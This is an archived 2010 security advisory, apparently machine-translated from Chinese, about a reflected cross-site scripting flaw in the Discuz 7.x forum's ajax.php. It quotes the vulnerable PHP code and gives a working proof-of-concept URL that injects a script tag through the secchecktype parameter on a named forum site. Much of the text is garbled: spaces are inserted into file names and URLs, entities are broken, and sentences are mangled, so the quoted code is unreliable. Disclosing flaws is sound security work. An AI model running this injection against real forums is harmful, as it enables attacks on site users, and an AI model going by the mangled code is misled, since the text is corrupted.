Discuz7. X registration code to extract the XSS cross-site vulnerabilities-vulnerability warning-the black bar safety net

2010-03-16T00:00:00
ID MYHACK58:62201026450
Type myhack58
Reporter 佚名
Modified 2010-03-16T00:00:00

Description

Vulnerability file: ajax.php Code reading:

$message = "<span id="seccodeswf_".$ secchecktype.""& gt;</span>". (extension_loaded("ming") ? "<script type=\"text/javascript\" reload=\"1\">\n$("seccodeswf_$secchecktype"). innerHTML=AC_FL_RunContent( "width", "$seccodedata[width]", "height", "$seccodedata[height]", "src", "seccode. php? update=$rand", "quality", "high", "wmode", "transparent", "bgcolor", "#ffffff", "align", "middle", "menu", "false", "allowScriptAccess", "sameDomain");\n</script>" : "<script type=\"text/javascript\" reload=\"1\">\n$("seccodeswf_$secchecktype"). innerHTML=AC_FL_RunContent( "width", "$seccodedata[width]", "height", "$seccodedata[height]", "src", "{$boardurl}images/seccode/flash/flash2. swf", "FlashVars", "sFile={$boardurl}seccode. php? update=$rand", "menu", "false", "allowScriptAccess", "sameDomain", "swLiveConnect", "true");\n</script>"); } elseif($seccodedata["type"] == 3) { $flashcode = "<span id=\"seccodeswf_$secchecktype\"></span><script type=\"text/javascript\" reload=\"1\">\n$("seccodeswf_$secchecktype"). innerHTML=AC_FL_RunContent( "id", "seccodeplayer", "name", "seccodeplayer", "width", "0", "height", "0", "src", "{$boardurl}images/seccode/flash/flash1. swf", "FlashVars", "sFile={$boardurl}seccode. php? update=$rand", "menu", "false", "allowScriptAccess", "sameDomain", "swLiveConnect", "true");\n</script>"; $message = "seccode_player"; } else { $message = "<img width="".$ seccodedata["width"]."" height="".$ seccodedata["height"]."" src="seccode. php? update=".$ rand."" class="absmiddle" alt="" />"; } } showmessage($message);

Vulnerability trigger conditions: on the part of the open forum Code of 7. X registration page is submitted to the configured URL path can be achieved tastelessXSSacross the station! Demo renderings: the

!

_

Vulnerability demo address: http://www.nohack.cn/bbs/ajax.php?action=updateseccode&secchecktype=%2 2><script>alert(/qing passing test/)</sCript>

Code: bbs/ajax. php? action=updateseccode&secchecktype=%2 2><script>alert(/qing passing test/)</sCript> Patches: no Note: IE8 will be blocked, test, on IE8 version under test, Firefox is also available!

_